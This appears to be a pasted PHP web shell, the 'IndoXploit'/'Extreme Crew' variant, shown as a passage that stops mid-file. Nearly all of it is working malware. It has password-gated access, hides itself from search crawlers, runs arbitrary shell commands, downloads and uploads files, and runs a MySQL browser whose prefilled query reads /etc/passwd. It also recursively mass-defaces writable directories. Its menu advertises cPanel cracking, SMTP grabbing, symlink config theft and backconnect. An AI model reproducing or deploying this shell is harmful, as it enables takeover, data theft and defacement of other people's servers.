· 9 years ago · Nov 13, 2016, 10:30 AM
1<?php
2session_start();
3error_reporting(0);
4set_time_limit(0);
5@set_magic_quotes_runtime(0);
6@clearstatcache();
7@ini_set('error_log',NULL);
8@ini_set('log_errors',0);
9@ini_set('max_execution_time',0);
10@ini_set('output_buffering',0);
11@ini_set('display_errors', 0);
12echo "
13
14<html>
15<body>
16<font color=black>crot</font></body></html>";
17return false;
18if(isset($_GET['crotz']) && ($_GET['crotz']) == '3xcr3w'){
19$auth_pass = "7b4939a8af28c814f0c757bb10f40d3d"; // default: IndoXploit
20$color = "#00ff00";
21$default_action = 'FilesMan';
22$default_use_ajax = true;
23$default_charset = 'UTF-8';
24if(!empty($_SERVER['HTTP_USER_AGENT'])) {
25 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
26 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
27 header('HTTP/1.0 404 Not Found');
28 exit;
29 }
30}
31
32function login_shell() {
33?>
34<html>
35<head>
36<title>IndoXploiasdasdasdt</title>
37<style type="text/css">
38html {
39 margin: 20px auto;
40 background: #000000;
41 color: green;
42 text-align: center;
43}
44header {
45 color: green;
46 margin: 10px auto;
47}
48input[type=password] {
49 width: 250px;
50 height: 25px;
51 color: red;
52 background: #000000;
53 border: 1px dotted green;
54 padding: 5px;
55 margin-left: 20px;
56 text-align: center;
57}
58</style>
59</head>
60<center>
61<header>
62 <pre>
63 ___________________________
64< root@indoxploit:~# w00t??? >
65 ---------------------------
66 \ , ,
67 \ /( )`
68 \ \ \___ / |
69 /- _ `-/ '
70 (/\/ \ \ /\
71 / / | ` \
72 O O ) / |
73 `-^--'`< '
74 (_.) _ ) /
75 `.___/` /
76 `-----' /
77<----. __ / __ \
78<----|====O)))==) \) /====
79<----' `--' `.__,' \
80 | |
81 \ /
82 ______( (_ / \______
83 ,' ,-----' | \
84 `--{__________) \/
85
86 </pre>
87</header>
88<form method="post">
89<input type="password" name="pass">
90</form>
91<?php
92exit;
93}
94if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
95 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
96 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
97 else
98 login_shell();
99
100if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
101 @ob_clean();
102 $file = $_GET['file'];
103 header('Content-Description: File Transfer');
104 header('Content-Type: application/octet-stream');
105 header('Content-Disposition: attachment; filename="'.basename($file).'"');
106 header('Expires: 0');
107 header('Cache-Control: must-revalidate');
108 header('Pragma: public');
109 header('Content-Length: ' . filesize($file));
110 readfile($file);
111 exit;
112}
113?>
114<html>
115<head>
116<title>Extreme Crew</title>
117<meta name='author' content='Extreme Crew'>
118<meta charset="UTF-8">
119<style type='text/css'>
120html {
121 background: url(https://scontent-sin6-1.xx.fbcdn.net/v/t35.0-12/15034164_367928330210716_2091404801_o.jpg?oh=66d4a333f4606c4dbd4835882fdcb5f2&oe=582AC064) fixed no-repeat;
122 background-size: 100% 100%;
123 color: #ffffff;
124 font-family: 'Ubuntu';
125 font-size: 13px;
126 width: 100%;
127}
128li {
129 display: inline;
130}
131table, th, td {
132 border-collapse:collapse;
133 font-family: Tahoma, Geneva, sans-serif;
134 background: transparent;
135}
136.table_home, .th_home, .td_home {
137 border: 1px solid #00FFFF;
138}
139th {
140 padding: 10px;
141}
142a {
143 color: #00FFFF;
144 text-decoration: none;
145}
146a:hover {
147 color: #00FFFF;
148 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
149 text-decoration:none;
150}
151b {
152 color: #00FFFF;
153}
154input[type=text], input[type=password],input[type=submit] {
155 background: transparent;
156 color: #00FFFF;
157 border: 1px solid #00FFFF;
158 margin: 5px auto;
159 padding-left: 5px;
160 font-family: 'Ubuntu';
161 font-size: 13px;
162}
163textarea {
164 border: 1px solid #00FFFF;
165 width: 100%;
166 height: 400px;
167 padding-left: 5px;
168 margin: 10px auto;
169 resize: none;
170 background: transparent;
171 color: #00FFFF;
172 font-family: 'Ubuntu';
173 font-size: 13px;
174}
175select {
176 width: 152px;
177 background: #000000;
178 color: lime;
179 border: 1px solid #00FFFF;
180 margin: 5px auto;
181 padding-left: 5px;
182 font-family: 'Ubuntu';
183 font-size: 13px;
184}
185option:hover {
186 background: lime;
187 color: #000000;
188}
189*{
190 text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
191 font-size:11px;
192 font-family:Tahoma,Verdana,Arial;
193 color:#00FFFF;
194}
195.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #00FFFF; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #00FFFF;-moz-box-shadow: 0px 4px 2px #00FFFF;}
196.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00FFFF;font-size:25px;text-shadow: 5px 5px 5px black;}
197.infoweb {
198 border-right: 1px solid #00FFFF;
199}
200a:hover{
201 text-decoration:none;
202}
203div #menu li:hover {cursor:pointer;
204}
205div#menu ul {
206 margin:1px 1px 1px 1px;padding:0;float:left;
207}
208div#menu li {
209 position:relative;display:block;float:left;
210}
211div#menu li:hover>ul {
212 left:0px;
213}
214div#menu a{
215 margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #00FFFF;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:#00FFFF;
216}
217div#menu a:hover{
218 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
219 text-decoration:none;
220}
221div#menu ul ul {
222 margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
223}
224div#menu ul ul a {
225 margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:#00FFFF;
226}
227.output {
228 margin:auto;border:2px solid #00FFFF;width:100%;height:400px;background:none;padding:0 2px;
229 }
230.cmdbox {
231 width:100%;
232}
233</style>
234</head>
235<?php
236
237function w($dir,$perm) {
238 if(!is_writable($dir)) {
239 return "<font color=red>".$perm."</font>";
240 } else {
241 return "<font color=lime>".$perm."</font>";
242 }
243}
244function r($dir,$perm) {
245 if(!is_readable($dir)) {
246 return "<font color=red>".$perm."</font>";
247 } else {
248 return "<font color=lime>".$perm."</font>";
249 }
250}
251function exe($cmd) {
252 if(function_exists('system')) {
253 @ob_start();
254 @system($cmd);
255 $buff = @ob_get_contents();
256 @ob_end_clean();
257 return $buff;
258 } elseif(function_exists('exec')) {
259 @exec($cmd,$results);
260 $buff = "";
261 foreach($results as $result) {
262 $buff .= $result;
263 } return $buff;
264 } elseif(function_exists('passthru')) {
265 @ob_start();
266 @passthru($cmd);
267 $buff = @ob_get_contents();
268 @ob_end_clean();
269 return $buff;
270 } elseif(function_exists('shell_exec')) {
271 $buff = @shell_exec($cmd);
272 return $buff;
273 }
274}
275function perms($file){
276 $perms = fileperms($file);
277 if (($perms & 0xC000) == 0xC000) {
278 // Socket
279 $info = 's';
280 } elseif (($perms & 0xA000) == 0xA000) {
281 // Symbolic Link
282 $info = 'l';
283 } elseif (($perms & 0x8000) == 0x8000) {
284 // Regular
285 $info = '-';
286 } elseif (($perms & 0x6000) == 0x6000) {
287 // Block special
288 $info = 'b';
289 } elseif (($perms & 0x4000) == 0x4000) {
290 // Directory
291 $info = 'd';
292 } elseif (($perms & 0x2000) == 0x2000) {
293 // Character special
294 $info = 'c';
295 } elseif (($perms & 0x1000) == 0x1000) {
296 // FIFO pipe
297 $info = 'p';
298 } else {
299 // Unknown
300 $info = 'u';
301 }
302 // Owner
303 $info .= (($perms & 0x0100) ? 'r' : '-');
304 $info .= (($perms & 0x0080) ? 'w' : '-');
305 $info .= (($perms & 0x0040) ?
306 (($perms & 0x0800) ? 's' : 'x' ) :
307 (($perms & 0x0800) ? 'S' : '-'));
308 // Group
309 $info .= (($perms & 0x0020) ? 'r' : '-');
310 $info .= (($perms & 0x0010) ? 'w' : '-');
311 $info .= (($perms & 0x0008) ?
312 (($perms & 0x0400) ? 's' : 'x' ) :
313 (($perms & 0x0400) ? 'S' : '-'));
314 // World
315 $info .= (($perms & 0x0004) ? 'r' : '-');
316 $info .= (($perms & 0x0002) ? 'w' : '-');
317 $info .= (($perms & 0x0001) ?
318 (($perms & 0x0200) ? 't' : 'x' ) :
319 (($perms & 0x0200) ? 'T' : '-'));
320 return $info;
321}
322function hdd($s) {
323 if($s >= 1073741824)
324 return sprintf('%1.2f',$s / 1073741824 ).' GB';
325 elseif($s >= 1048576)
326 return sprintf('%1.2f',$s / 1048576 ) .' MB';
327 elseif($s >= 1024)
328 return sprintf('%1.2f',$s / 1024 ) .' KB';
329 else
330 return $s .' B';
331}
332function ambilKata($param, $kata1, $kata2){
333 if(strpos($param, $kata1) === FALSE) return FALSE;
334 if(strpos($param, $kata2) === FALSE) return FALSE;
335 $start = strpos($param, $kata1) + strlen($kata1);
336 $end = strpos($param, $kata2, $start);
337 $return = substr($param, $start, $end - $start);
338 return $return;
339}
340function getsource($url) {
341 $curl = curl_init($url);
342 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
343 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
344 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
345 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
346 $content = curl_exec($curl);
347 curl_close($curl);
348 return $content;
349}
350function bing($dork) {
351 $npage = 1;
352 $npages = 30000;
353 $allLinks = array();
354 $lll = array();
355 while($npage <= $npages) {
356 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
357 if($x) {
358 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
359 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
360 $npage = $npage + 10;
361 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
362 } else break;
363 }
364 $URLs = array();
365 foreach($allLinks as $url){
366 $exp = explode("/", $url);
367 $URLs[] = $exp[2];
368 }
369 $array = array_filter($URLs);
370 $array = array_unique($array);
371 $sss = count(array_unique($array));
372 foreach($array as $domain) {
373 echo $domain."\n";
374 }
375}
376function reverse($url) {
377 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
378 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
379 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
380 curl_setopt($ch, CURLOPT_HEADER, 0);
381 curl_setopt($ch, CURLOPT_POST, 1);
382 $resp = curl_exec($ch);
383 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
384 $array = explode(",,", $resp);
385 unset($array[0]);
386 foreach($array as $lnk) {
387 $lnk = "http://$lnk";
388 $lnk = str_replace(",", "", $lnk);
389 echo $lnk."\n";
390 ob_flush();
391 flush();
392 }
393 curl_close($ch);
394}
395if(get_magic_quotes_gpc()) {
396 function ec_ss($array) {
397 return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
398 }
399 $_POST = ec_ss($_POST);
400 $_COOKIE = ec_ss($_COOKIE);
401}
402
403if(isset($_GET['folder'])) {
404 $dir = $_GET['folder'];
405 chdir($dir);
406} else {
407 $dir = getcwd();
408}
409$kernel = php_uname();
410$ip = gethostbyname($_SERVER['HTTP_HOST']);
411$dir = str_replace("\\","/",$dir);
412$scdir = explode("/", $dir);
413$freespace = hdd(disk_free_space("/"));
414$total = hdd(disk_total_space("/"));
415$used = $total - $freespace;
416$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
417$ds = @ini_get("disable_functions");
418$mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
419$curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
420$wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
421$perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
422$python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
423$show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
424if(!function_exists('posix_getegid')) {
425 $user = @get_current_user();
426 $uid = @getmyuid();
427 $gid = @getmygid();
428 $group = "?";
429} else {
430 $uid = @posix_getpwuid(posix_geteuid());
431 $gid = @posix_getgrgid(posix_getegid());
432 $user = $uid['name'];
433 $uid = $uid['uid'];
434 $group = $gid['name'];
435 $gid = $gid['gid'];
436}
437echo "<table>";
438echo "<td class=infoweb>";
439echo "System: <font color=lime>".$kernel."</font><br>";
440echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
441echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
442echo "Safe Mode: $sm<br>";
443echo "Disable Functions: $show_ds<br>";
444echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
445echo "Current DIR: ";
446foreach($scdir as $c_dir => $cdir) {
447 echo "<a href='?ec=ciumakumz&folder=";
448 for($i = 0; $i <= $c_dir; $i++) {
449 echo $scdir[$i];
450 if($i != $c_dir) {
451 echo "/";
452 }
453 }
454 echo "'>$cdir</a>/";
455}
456echo " [ ".w($dir, perms($dir))." ]";
457echo "</td><td style='width:20%'>";
458echo " Server IP: <font color=lime>".$ip."</font><br> Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
459echo "<br><br>";
460echo " <a href='?' style='border:1px solid #00FFFF;font:12px ;width:200px;padding:0px 20px 0px 20px;'>H O M E</a> <a href='?ec=ciumakumz&do=kill' style='border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>K I L L </a> <a href='?ec=ciumakumz&logout=true' style='color:red;border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>L O G O U T</a>";
461echo "</td></table>";
462echo "<hr>";
463echo "
464<table>
465<tr>
466<div id='menu'>
467 <ul class=menu>
468 <li><a href='?ec=ciumakumz&folder=$dir'>Filesman</a></li>
469 <li><a href='?ec=ciumakumz&folder=$dir&do=cmd'>Command</a></li>
470 <li><a href='?ec=ciumakumz&folder=$dir&do=jumping'>Jumper</a></li>
471 <li><a>Symlink</a>
472 <ul>
473 <li><a href='?ec=ciumakumz&folder=$dir&do=config' style='background-color:black'> Config</a></li>
474 <li><a href='?ec=ciumakumz&folder=$dir&do=convh' style='background-color:black'> Config vhosts</a></li>
475 <li><a href='?ec=ciumakumz&folder=$dir&do=symser' style='background-color:black'> Symlink Server</a></li>
476 </ul>
477 </li>
478 <li><a>Mass</a>
479 <ul>
480 <li><a href='?ec=ciumakumz&folder=$dir&do=mass_deface' style='background:black'> Mass Deface</a></li>
481 <li><a href='?ec=ciumakumz&folder=$dir&do=mass_helper' style='background:black'> Mass Helper</a></li>
482 </ul>
483 </li>
484 <li><a href='?ec=ciumakumz&folder=$dir&do=domains'>Domains</a></li>
485 <li><a href='?ec=ciumakumz&folder=$dir&do=upload'>Upladoer</a></li>
486 <li><a>Tools</a>
487 <ul>
488 <li><a href='?ec=ciumakumz&folder=$dir&do=zoneh' style='background-color:black'> Zone-H</a></li>
489 <li><a href='?ec=ciumakumz&folder=$dir&do=network' style='background-color:black'> Backconnect</a></li>
490 <li><a href='?ec=ciumakumz&folder=$dir&do=mysql' style='background-color:black'> Mysql Interface</a></li>
491 <li><a href='?ec=ciumakumz&folder=$dir&do=adminer' style='background-color:black'> Adminer</a></li>
492 </ul>
493 </li>
494 <li><a>Grab/Crack</a>
495 <ul>
496 <li><a href='?ec=ciumakumz&folder=$dir&do=cpanel' style='background-color:black'> Cpanel Cracker</a></li>
497 <li><a href='?ec=ciumakumz&folder=$dir&do=smtp' style='background-color:black'> SMTP Grabber</a></li>
498 </ul>
499 </li>
500 <li><a>Bypass</a>
501 <ul>
502 <li><a href='?ec=ciumakumz&folder=$dir&do=etcpler' style='background-color:black'> etc/passw</a></li>
503 <li><a href='?ec=ciumakumz&folder=$dir&do=bypass' style='background-color:black'> Disable Functions</a></li>
504 </ul>
505 </li>
506 <li><a href='?ec=ciumakumz&folder=$dir&do=boom'>Ngindex</a></li>
507 </ul>
508 </div></tr><br><br>";
509 echo "<hr>";
510 echo "<table>";
511if($_GET['logout'] == true) {
512 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
513 echo "<script>window.location='?';</script>";
514} elseif($_GET['do'] == 'upload') {
515 echo "<center>";
516 if($_POST['upload']) {
517 if($_POST['tipe_upload'] == 'biasa') {
518 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
519 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
520 } else {
521 $act = "<font color=red>failed to upload file</font>";
522 }
523 } else {
524 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
525 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
526 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
527 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
528 $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
529 } else {
530 $act = "<font color=red>failed to upload file</font>";
531 }
532 } else {
533 $act = "<font color=red>failed to upload file</font>";
534 }
535 }
536 }
537 echo "Upload File:
538 <form method='post' enctype='multipart/form-data'>
539 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
540 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
541 <input type='file' name='ix_file'>
542 <input type='submit' value='upload' name='upload'>
543 </form>";
544 echo $act;
545 echo "</center>";
546} elseif($_GET['do'] == 'kill') {
547 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
548 die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
549 else
550 echo '<center>unlink failed!</center>';
551} elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?ec=ciumakumz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?ec=ciumakumz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?ec=ciumakumz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
552while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
553foreach($tables as $table){$msg .= "<tr><td><a href='?ec=ciumakumz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
554elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
555$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
556list($total) = mysql_fetch_row($hasil);
557if(isset($_GET['z'])) $page = (int) $_GET['z'];
558else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
559while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
560$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
561for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
562if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
563elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
564$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
565if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
566for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
567if($rows[$j] == "") $dataz = " ";
568else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
569else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
570else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
571while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
572$msg .= "<tr><td><a href='?ec=ciumakumz&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
573@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
574<br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
575<?php }}
576 elseif($_GET['do'] == 'cmd') {?>
577<form action="?ec=ciumakumz&act=<?php echo $dir;?>&do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
578<textarea class="output" readonly>
579<?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
580</textarea> <tr><td colspan="2"><?php echo "$user >";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
581<?php } elseif($_GET['do'] == 'mass_deface') {
582 function sabun_massal($dir,$namafile,$isi_script) {
583 if(is_writable($dir)) {
584 $dira = scandir($dir);
585 foreach($dira as $dirb) {
586 $dirc = "$dir/$dirb";
587 $lokasi = $dirc.'/'.$namafile;
588 if($dirb === '.') {
589 file_put_contents($lokasi, $isi_script);
590 } elseif($dirb === '..') {
591 file_put_contents($lokasi, $isi_script);
592 } else {
593 if(is_dir($dirc)) {
594 if(is_writable($dirc)) {
595 echo "[<font color=lime>DONE</font>] $lokasi<br>";
596 file_put_contents($lokasi, $isi_script);
597 $idx = sabun_massal($dirc,$namafile,$isi_script);
598 }
599 }
600 }
601 }
602 }
603 }
604 function sabun_biasa($dir,$namafile,$isi_script) {
605 if(is_writable($dir)) {
606 $dira = scandir($dir);
607 foreach($dira as $dirb) {
608 $dirc = "$dir/$dirb";
609 $lokasi = $dirc.'/'.$namafile;
610 if($dirb === '.') {
611 file_put_contents($lokasi, $isi_script);
612 } elseif($dirb === '..') {
613 file_put_contents($lokasi, $isi_script);
614 } else {
615 if(is_dir($dirc)) {
616 if(is_writable($dirc)) {
617 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
618 file_put_contents($lokasi, $isi_script);
619 }
620 }
621 }
622 }
623 }
624 }
